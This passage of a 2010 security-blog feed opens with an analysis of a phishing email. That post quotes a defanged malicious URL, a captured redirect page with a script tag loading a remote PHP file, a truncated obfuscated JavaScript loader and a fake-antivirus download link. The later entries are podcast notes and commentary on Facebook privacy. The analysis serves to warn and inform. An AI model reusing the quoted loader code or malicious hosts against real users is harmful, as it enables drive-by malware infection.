<p><a href="http://www.spylogic.net/wp-content/uploads/2010/06/email_phish.jpg"><img class="alignnone size-medium wp-image-471" title="email_phish" src="http://www.spylogic.net/wp-content/uploads/2010/06/email_phish-300x193.jpg" alt="" width="300" height="193" /></a></p>
<p><strong>The Link</strong><br />
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:</p>
<p>An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:</p>
<blockquote><p>HTTP/1.0 200 OK<br />
Connection: close<br />
Content-Length: 250<br />
Content-Type: text/html<br />
Date: Wed, 23 Jun 2010 15:09:53 GMT<br />
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT<br />
Server: IdeaWebServer/v0.70</p>
<p>&lt;!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”&gt;</p>
<p>&lt;META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”&gt;<br />
&lt;title&gt;&lt;/title&gt;</p>
<p>&lt;html&gt;&lt;head&gt;<br />
&lt;/head&gt;&lt;/html&gt;&lt;script src=hxxp://eurolisting.net/Cgi-bin/markprint.php &gt;&lt;/script&gt;</p></blockquote>
<p>The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:</p>
<blockquote><p>HTTP/1.1 200 OK<br />
Connection: close<br />
Date: Wed, 23 Jun 2010 17:46:54 GMT<br />
Server: Microsoft-IIS/6.0<br />
X-Powered-By: ASP.NET<br />
X-Powered-By: PHP/5.2.6<br />
Set-Cookie: PHPSESSID=1287414902; path=/<br />
Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />
Pragma: no-cache<br />
Content-Type: application/javascript</p>
<p>// &lt;script&gt;<br />
function cxx(wcH){return wcH.replace(/%/g,”).replace(/['ow:Y]/g,fUp)}<br />
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f &lt;SNIP&gt;</p></blockquote>
<p>All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through <a href="http://jsunpack.jeek.org">jsunpack</a> (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the <a href="http://jsunpack.jeek.org/dec/go?report=cbb10579a66ac694ab7265538a98582d6f1ff709">jsunpack site</a>.</p>
<p>Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404′s.  You can also see this in the Wireshark capture below:</p>
<p><a href="http://www.spylogic.net/wp-content/uploads/2010/06/wireshark.jpg"><img class="alignnone size-medium wp-image-472" title="wireshark" src="http://www.spylogic.net/wp-content/uploads/2010/06/wireshark-300x71.jpg" alt="" width="300" height="71" /></a></p>
<p>In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:</p>
<p>hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&amp;i=JcmridQaq/ykgRj4UMpOy5Ec&amp;e=4</p>
<p>This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.</p>
<p><a href="http://www.spylogic.net/wp-content/uploads/2010/06/fake_av4.jpg"><img class="alignnone size-medium wp-image-493" title="fake_av4" src="http://www.spylogic.net/wp-content/uploads/2010/06/fake_av4-300x172.jpg" alt="" width="300" height="172" /></a></p>
<p>You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.</p>
<p>What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to <a href="http://securityblahblah.blogspot.com/">Greg</a> and <a href="http://secshoggoth.blogspot.com">Tyler</a> for providing intel about these domains and some of the analysis.</p>
<div class="feedflare"><a href="http://feeds.feedburner.com/~ff/spylogic?a=RhpSFsGWKAg:fdXvEJaEHs8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/spylogic?i=RhpSFsGWKAg:fdXvEJaEHs8:V_sGLiPBpWU" border="0" alt="" /></a> <a href="http://feeds.feedburner.com/~ff/spylogic?a=RhpSFsGWKAg:fdXvEJaEHs8:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/spylogic?i=RhpSFsGWKAg:fdXvEJaEHs8:F7zBnMyn0Lo" border="0" alt="" /></a> <a href="http://feeds.feedburner.com/~ff/spylogic?a=RhpSFsGWKAg:fdXvEJaEHs8:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/spylogic?i=RhpSFsGWKAg:fdXvEJaEHs8:gIN9vFwOqvQ" border="0" alt="" /></a></div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=itpXZ6LOHO8:fdXvEJaEHs8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/itpXZ6LOHO8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/spylogic/~3/RhpSFsGWKAg/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://feedproxy.google.com/~r/spylogic/~3/RhpSFsGWKAg/</feedburner:origLink></item>
		<item>
		<title>Social Media Security Podcast 15 – Current Facebook Security Issues, New Privacy Tools, Likejacking, Formspring, Social Media at Work</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/Yqsm76a3Hs8/</link>
		<comments>http://socialmediasecurity.com/2010/06/19/social-media-security-podcast-15-%e2%80%93-current-facebook-security-issues-new-privacy-tools-likejacking-formspring-social-media-at-work/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 17:30:17 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Podcasts]]></category>
		<category><![CDATA[bing]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[scott]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[socialmedia]]></category>
		<category><![CDATA[socnetsec]]></category>
		<category><![CDATA[tom]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://socialmediasecurity.com/?p=2358</guid>
		<description><![CDATA[This is the 15th episode of the Social Media Security Podcast recorded June 11th, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast: Our Facebook Privacy &#38; Security Guide has been updated to v2.2.  We are working on the [...]]]></description>
			<content:encoded><![CDATA[<p>This is the 15th episode of the Social Media Security Podcast recorded June 11th, 2010.  This episode was hosted by <a href="http://twitter.com/agent0x0">Tom Eston</a> and <a href="http://twitter.com/streetsec">Scott Wright</a>.  Below are the      show notes, links to articles and news mentioned in the podcast:</p>
<ul>
<li>Our <a href="http://socialmediasecurity.com/security-guides/facebook/">Facebook Privacy &amp; Security Guide</a> has been updated to v2.2.  We are working on the LinkedIn Privacy &amp; Security Guide!</li>
<li><a href="http://www.wikihow.com/Permanently-Delete-a-Facebook-Account">How to  permanently delete your Facebook account</a></li>
<li><a href="http://www.quitfacebookday.com/">Quit Facebook Day</a> &#8211; May 31st <a href="http://mobile.chicagotribune.com/inf/infomo;jsessionid=E73BAD5827557872B3AF.78?view=business_article&amp;feed:a=chi_trib_1min&amp;feed:c=business&amp;feed:i=54213595&amp;nopaging=1">was it successful</a>?</li>
<li><a href="http://www.benedelman.org/news/052010-1.html">Facebook Leaks Usernames, User IDs, and Personal Details to Advertisers</a></li>
<li><a href="http://www.pcworld.com/businesscenter/article/196617/facebook_fixing_embarrassing_privacy_bug.html">Facebook Fixing Embarrassing Privacy Bug (CSRF)</a>. <a href="http://www.alertlogic.com/enterprise/blogs/32">Video here</a>.</li>
<li>Facebook <a href="http://www.sophos.com/blogs/sophoslabs/?p=9869">“likejacking”</a> targets World Cup, BP, Shrek, UFC, …</li>
<li>ReclaimPrivacy.org &#8211; <a href="http://www.reclaimprivacy.org/facebook">Facebook Privacy Scanner</a></li>
<li><a href="http://www.readwriteweb.com/archives/facebook_firehose_search_comes_to_bing.php">Facebook firehose</a> comes to <a href="http://www.bing.com/social">Bing</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/formspring-me-xss-vulnerability/">Formspring.me XSS flaw</a></li>
<li><a href="http://www.blackweb20.com/2010/05/20/myspace-announces-new-privacy-controls-gives-way-to-bright-flight/">MySpace Announces New Privacy Controls</a></li>
<li><a href="http://www.cleveland.com/business/index.ssf/2010/06/social_media_pose_the_latest_c.html">Social media pose the latest challenge in separating work from personal spaces</a></li>
</ul>
<p>Please send any show feedback to <strong>feedback [aT]      socialmediasecurity.com</strong> or comment below.  You can also call      our voice mail box at <strong>1-613-693-0997</strong> if you have a      question for our Q&amp;A section on the next episode.  <strong>You can      also <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=329032812">subscribe      to the podcast in iTunes</a>. </strong>Thanks for listening!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=Yqsm76a3Hs8:aq6HvfcyHEg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/Yqsm76a3Hs8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://socialmediasecurity.com/2010/06/19/social-media-security-podcast-15-%e2%80%93-current-facebook-security-issues-new-privacy-tools-likejacking-formspring-social-media-at-work/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<enclosure url="http://socialmediasecurity.com/podpress_trac/feed/2358/0/SocialMediaSecurityPodcast_15.mp3" length="20805684" type="audio/mpeg" />
<itunes:duration>43:15</itunes:duration>
		<itunes:subtitle>This is the 15th episode of the Social Media Security Podcast recorded June 11th, 2010.nbsp; This episode was hosted by Tom Eston and Scott Wright.nbsp; ...</itunes:subtitle>
		<itunes:summary>This is the 15th episode of the Social Media Security Podcast recorded June 11th, 2010.nbsp; This episode was hosted by Tom Eston and Scott Wright.nbsp; Below are the      show notes, links to articles and news mentioned in the podcast:

	Our Facebook Privacy #38; Security Guide has been updated to v2.2.nbsp; We are working on the LinkedIn Privacy #38; Security Guide!
	How to  permanently delete your Facebook account
	Quit Facebook Day - May 31st was it successful?
	Facebook Leaks Usernames, User IDs, and Personal Details to Advertisers
	Facebook Fixing Embarrassing Privacy Bug (CSRF). Video here.
	Facebook ldquo;likejackingrdquo; targets World Cup, BP, Shrek, UFC, hellip;
	ReclaimPrivacy.org - Facebook Privacy Scanner
	Facebook firehose comes to Bing
	Formspring.me XSS flaw
	MySpace Announces New Privacy Controls
	Social media pose the latest challenge in separating work from personal spaces

Please send any show feedback to feedback [aT]      socialmediasecurity.com or comment below.nbsp; You can also call      our voice mail box at 1-613-693-0997 if you have a      question for our Q#38;A section on the next episode.nbsp; You can      also subscribe      to the podcast in iTunes. Thanks for listening!</itunes:summary>
		<itunes:keywords>security,socialmedia,privacy,facebook,myspace,twitter,socialnetworking,internet</itunes:keywords>
		<itunes:author>Social Media Security</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>No</itunes:block>
	<media:content url="http://socialmediasecurity.com/podpress_trac/feed/2358/0/SocialMediaSecurityPodcast_15.mp3" fileSize="20805684" type="audio/mpeg" /><feedburner:origLink>http://socialmediasecurity.com/2010/06/19/social-media-security-podcast-15-%e2%80%93-current-facebook-security-issues-new-privacy-tools-likejacking-formspring-social-media-at-work/</feedburner:origLink></item>
		<item>
		<title>Facebook Privacy &amp; Security Guide Updated to v2.2</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/lw6w3XOn7bk/</link>
		<comments>http://feedproxy.google.com/~r/spylogic/~3/WCGmP5WDWNk/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 04:05:41 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://www.spylogic.net/?p=459</guid>
		<description><![CDATA[I have updated the Facebook Privacy &#38; Security Guide to version 2.2 over on SocialMediaSecurity.com.  If you&#8217;re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It&#8217;s free, printable and meant to be shared. This update includes details [...]]]></description>
			<content:encoded><![CDATA[<p>I have updated the <a href="http://socialmediasecurity.com/security-guides/facebook/">Facebook Privacy &amp; Security Guide</a> to version 2.2 over on <a href="http://socialmediasecurity.com">SocialMediaSecurity.com</a>.  If you&#8217;re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It&#8217;s free, printable and meant to be shared.</p>
<p>This update includes details on all the recent changes to Facebook&#8217;s privacy settings that went live May 26, 2010.  I have also included more information on &#8220;Instant Personalization&#8221;, removing yourself from &#8220;Platform&#8221;, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile&#8230;yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!</p>
<p><a href="http://socialmediasecurity.com/downloads/Facebook_Privacy_and_Security_Guide.pdf">Download the latest version of the Facebook Privacy &amp; Security Guide here.</a></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/spylogic?a=WCGmP5WDWNk:EOz_JMI1g5U:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/spylogic?i=WCGmP5WDWNk:EOz_JMI1g5U:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/spylogic?a=WCGmP5WDWNk:EOz_JMI1g5U:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/spylogic?i=WCGmP5WDWNk:EOz_JMI1g5U:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/spylogic?a=WCGmP5WDWNk:EOz_JMI1g5U:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/spylogic?i=WCGmP5WDWNk:EOz_JMI1g5U:gIN9vFwOqvQ" border="0"></img></a>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=lw6w3XOn7bk:EOz_JMI1g5U:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/lw6w3XOn7bk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/spylogic/~3/WCGmP5WDWNk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<enclosure url="http://socialmediasecurity.com/downloads/Facebook_Privacy_and_Security_Guide.pdf" length="101557" type="application/pdf" /><media:content url="http://socialmediasecurity.com/downloads/Facebook_Privacy_and_Security_Guide.pdf" fileSize="101557" type="application/pdf" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Social Media Security Podcast</itunes:subtitle><itunes:summary>A podcast exposing the insecurity of social media. Hosts are Scott Wright from the Street-Wise Security Zone, Tom Eston founder of SocialMediaSecurity.com and Kevin Johnson SANS instructor and senior security consultant with InGuardians.</itunes:summary><itunes:keywords>twitter,facebook,myspace,privacy,security,socialmedia,socialnetworking</itunes:keywords><feedburner:origLink>http://feedproxy.google.com/~r/spylogic/~3/WCGmP5WDWNk/</feedburner:origLink></item>
		<item>
		<title>My Thoughts on the New Facebook Privacy Controls</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/-ZxtrNnQ1jI/</link>
		<comments>http://feedproxy.google.com/~r/spylogic/~3/Q64TTlIOQ8I/#comments</comments>
		<pubDate>Thu, 27 May 2010 04:12:38 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://www.spylogic.net/?p=457</guid>
		<description><![CDATA[Ever since I started the Facebook Privacy &#38; Security Guide back in October 2008 I knew that Facebook&#8217;s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been [...]]]></description>
			<content:encoded><![CDATA[<p>Ever since I started the <a href="http://socialmediasecurity.com/downloads/Facebook_Privacy_and_Security_Guide.pdf">Facebook Privacy &amp; Security Guide</a> back in October 2008 I knew that Facebook’s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been in Facebook’s financial interest to *really* show you how to protect the information you post.  These are all reasons was why I started the guide and hopefully over the last few years it has helped spread some awareness on how to control the information you post a little better.  Working on the guide has been frustrating at times because Facebook would make settings more confusing, remove settings that were useful and then bring them back again in some other form.  In the latest versions of the guide I often wondered how I was going to fit all the settings and their explanations into a two-sided handout.  The handout format has always been important to me so it could be easily distributed. <img class="wp-smiley" src="http://www.spylogic.net/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
<p>Jumping forward to today we see yet <a href="http://blog.facebook.com/blog.php?post=391922327130">another iteration of these settings</a>.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  <a href="http://www.eff.org/deeplinks/2010/05/more-privacy-facebook-new-privacy-controls">The EFF has a good post up about the new settings</a>.  They even have a <a href="http://www.youtube.com/watch?v=TGkUA84ftYU">YouTube video</a> showing you the changes and their recommendations.  <a href="http://theharmonyguy.com/2010/05/26/facebook-backtracks-on-privacy-controls-and-public-information/">The other post you should read is one by theharmonyguy</a> who, as always, has very good analysis of these settings and Facebook overall.</p>
<p>My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for <a href="http://www.forbes.com/2010/04/05/google-facebook-twitter-technology-security-10-privacy.html">Forbes</a> regarding statements that “Privacy is Dead”:</p>
<blockquote><p>“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”</p></blockquote>
<div class="feedflare"><a href="http://feeds.feedburner.com/~ff/spylogic?a=Q64TTlIOQ8I:PLfbd0e6Qx4:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/spylogic?i=Q64TTlIOQ8I:PLfbd0e6Qx4:V_sGLiPBpWU" border="0" alt="" /></a> <a href="http://feeds.feedburner.com/~ff/spylogic?a=Q64TTlIOQ8I:PLfbd0e6Qx4:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/spylogic?i=Q64TTlIOQ8I:PLfbd0e6Qx4:F7zBnMyn0Lo" border="0" alt="" /></a> <a href="http://feeds.feedburner.com/~ff/spylogic?a=Q64TTlIOQ8I:PLfbd0e6Qx4:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/spylogic?i=Q64TTlIOQ8I:PLfbd0e6Qx4:gIN9vFwOqvQ" border="0" alt="" /></a></div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=-ZxtrNnQ1jI:PLfbd0e6Qx4:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/-ZxtrNnQ1jI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/spylogic/~3/Q64TTlIOQ8I/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<enclosure url="http://socialmediasecurity.com/downloads/Facebook_Privacy_and_Security_Guide.pdf" length="98935" type="application/pdf" /><media:content url="http://socialmediasecurity.com/downloads/Facebook_Privacy_and_Security_Guide.pdf" fileSize="98935" type="application/pdf" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Social Media Security Podcast</itunes:subtitle><itunes:summary>A podcast exposing the insecurity of social media. Hosts are Scott Wright from the Street-Wise Security Zone, Tom Eston founder of SocialMediaSecurity.com and Kevin Johnson SANS instructor and senior security consultant with InGuardians.</itunes:summary><itunes:keywords>twitter,facebook,myspace,privacy,security,socialmedia,socialnetworking</itunes:keywords><feedburner:origLink>http://feedproxy.google.com/~r/spylogic/~3/Q64TTlIOQ8I/</feedburner:origLink></item>
		<item>
		<title>Facebook Backtracks on Privacy Controls and Public Information</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/_tFZEO6jOuI/</link>
		<comments>http://feedproxy.google.com/~r/theharmonyguy/~3/2Jj063gweH0/#comments</comments>
		<pubDate>Wed, 26 May 2010 19:35:47 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://theharmonyguy.com/?p=927</guid>
		<description><![CDATA[Facebook CEO Mark Zuckerberg held a press conference today announcing significant changes to the site&#8217;s privacy settings. The latest updates come after weeks of debate and criticism over Facebook&#8217;s handling of user information. Though it may take several days or weeks to roll out the new controls, an official privacy guide provides a summary of [...]]]></description>
			<content:encoded><![CDATA[<p>Facebook CEO Mark Zuckerberg held a <a title="Facebook event will outline 'simpler' privacy controls | Politics and Law - CNET News" href="http://news.cnet.com/8301-13578_3-20005976-38.html?tag=newsEditorsPicksArea.0">press conference</a> today announcing <a title="Facebook | Making Control Simple" href="http://blog.facebook.com/blog.php?post=391922327130">significant changes</a> to the site&#8217;s privacy settings. The latest updates come after weeks of debate and criticism over Facebook&#8217;s handling of user information. Though it may take several days or weeks to roll out the new controls, an <a title="Facebook | Privacy Guide" href="http://www.facebook.com/privacy/explanation.php">official privacy guide</a> provides a summary of how they work. Full details are still rolling in, but certain aspects are already clear.</p>
<p>First, the new interface for making many changes appears to be much more streamlined. This should be a welcome change to those confused by the previous <a title="Facebook Privacy: A Bewildering Tangle of Options" href="http://www.nytimes.com/interactive/2010/05/12/business/facebook-privacy.html">litany of options</a>. The primary privacy page displays a table with columns for &#8220;Everyone,&#8221; &#8220;Friends of Friends,&#8221; and &#8220;Friends Only,&#8221; with rows for several categories of content. This table not only establishes settings for certain bits of profile information; it also lets users set defaults for new content shared.</p>
<p><span id="more-927"></span>Second, Facebook has removed the requirement that &#8220;connections,&#8221; such as your list of friends and the pages you &#8220;like,&#8221; always be publicly available information. A secondary page will provide access controls for certain groups of these connections, as well as who can friend you, send you messages, or see your profile in search results.</p>
<p>Third, users will have new options related to third-party applications that integrate with Facebook. The company had <a title="Pros and Cons of Today’s Facebook Announcements" href="http://theharmonyguy.com/2010/04/21/pros-and-cons-of-todays-facebook-announcements/">previously announced</a> a granular permissions model for applications, and developers are in the process of transitioning to the new setup. Those permissions will now be reflected in the privacy settings, though how that will look is not yet clear. (Also, Facebook&#8217;s privacy guide assures users that applications can only request &#8220;information that&#8217;s needed for them to work,&#8221; but that&#8217;s up to developers.) Facebook is also re-instating an option to completely opt-out from the Facebook Platform. This setting had been available prior to changes last fall. However, it now appears that this opt-out will also be the only way to avoid public content being indexed by search engines.</p>
<p>Zuckerberg promised an &#8220;easy&#8221; way to opt-out of the controversial instant personalization program, which lets certain third-party websites automatically identify Facebook visitors, but the feature remains opt-out. Many of the other privacy settings are also still opt-out in that the site defaults appear to remain the same, presented as &#8220;Recommended&#8221; when a new user checks them.</p>
<p>I&#8217;ve been concerned about the tone of some Facebook responses to recent privacy concerns, and today&#8217;s presentation by Zuckerberg was no exception. He noted that the company had not seen any noticeable impact on site usage lately, and according to one report commented, &#8220;Perhaps the personal privacy preferences of liberal advocacy groups and DC politicians don&#8217;t match with those of the general public.&#8221; That may be true, though I think politicians or privacy advocates have a deeper understanding of recent changes than the general public. Still, this sort of remark comes across as at best somewhat irritated and at worst rather arrogant. It also probably won&#8217;t win over any liberal advocacy groups or DC politicians. (For the record, I don&#8217;t fall into either category.)</p>
<p>Other aspects of the announcements lead me to wonder how much Facebook truly understands the rising worries over the site&#8217;s handling of privacy issues.  Zuckerberg emphasized the site&#8217;s focus on sharing, that users want to share, and his belief that people want to share more openly. The default privacy options clearly reflect this belief, positioning Facebook as a site generally intended for public sharing.</p>
<p>But I think Zuckerberg is confusing the desire to share easily or freely and the desire to share publicly. Several researchers have explored how people approach privacy, and people constantly use services such as Facebook to post content they would not want distributed to the entire Internet. We&#8217;ve become accustomed to the idea of being private in public, since our offline conversations in public settings are not recorded and indexed for <a title="Openbook - Connect and share whether you want to or not" href="http://youropenbook.org/">anyone to search</a>. What would be the harm to users if content was private by default, but could be opened to the public if the author wanted that? After all, this is how Facebook operated for the first few years of its existence &#8211; and it likely played a significant role in the site&#8217;s growth.</p>
<p>Of course, while an opt-in approach may help many users, <a title="4 things Facebook doesn't tell you about your privacy and security" href="http://www.csoonline.com/article/593371/4_things_Facebook_doesn_t_tell_you_about_your_privacy_and_security">Facebook wants</a> users to share more openly. More public content provides more value for other services that might integrate with Facebook, extending the site&#8217;s reach and influence. That&#8217;s part of why I find it difficult to simply accept Zuckerberg&#8217;s notion that most people are moving towards public sharing on their own: regardless of what individuals think, Facebook itself certainly has an opinion on how much you should share.</p>
<p>And that&#8217;s the real question &#8211; how much you share, not whether you share. I&#8217;ve never been opposed to making it easier for users to share content. But I do have a problem when a site that was built on sharing with a limited audience reorganizes to make that same type of sharing <a title="Should Government Take On Facebook?" href="http://roomfordebate.blogs.nytimes.com/2010/05/25/should-government-take-on-facebook/#clay">more difficult</a> than fully public sharing &#8211; an activity that carries far more potential dangers, both social and otherwise.</p>
<p>Facebook has built an unprecedented audience of users who give it significant trust. I&#8217;m glad to see the company making welcome changes which assist users who actively care about privacy controls. But I remain concerned that the company&#8217;s overall perspective still reflects questionable ideas, such as the notion most people are not concerned about privacy, and either fails to recognize the company&#8217;s role as a trend-setter or ingenuously downplays it. That&#8217;s not a personal attack on Zuckerberg, whom I&#8217;ve never met, or anyone else at Facebook. It&#8217;s simply my evaluation of the service&#8217;s direction based on recent features and public relations. And I think Facebook owes its users much better.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/theharmonyguy?a=2Jj063gweH0:rycZPc8C4ss:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/theharmonyguy?d=YwkR-u9nhCs" border="0"></img></a>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=_tFZEO6jOuI:rycZPc8C4ss:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/_tFZEO6jOuI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/theharmonyguy/~3/2Jj063gweH0/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://feedproxy.google.com/~r/theharmonyguy/~3/2Jj063gweH0/</feedburner:origLink></item>
		<item>
		<title>Social Media Security Podcast 14 – Recent Facebook Hacks and Controversy, Diaspora, Swipely</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/IiB2xBQMIxg/</link>
		<comments>http://socialmediasecurity.com/2010/05/20/social-media-security-podcast-14-recent-facebook-hacks-and-controversy-diaspora-swipely/#comments</comments>
		<pubDate>Fri, 21 May 2010 02:23:01 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Podcasts]]></category>
		<category><![CDATA[diaspora]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[scott]]></category>
		<category><![CDATA[swipely]]></category>
		<category><![CDATA[tom]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[yelp]]></category>

		<guid isPermaLink="false">http://socialmediasecurity.com/?p=2317</guid>
		<description><![CDATA[This is the 14th episode of the Social Media Security Podcast recorded May 14th, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast: Yelp Security Hole Puts Facebook User Data At Risk, Underscores Problems With Instant Personalization (two XSS [...]]]></description>
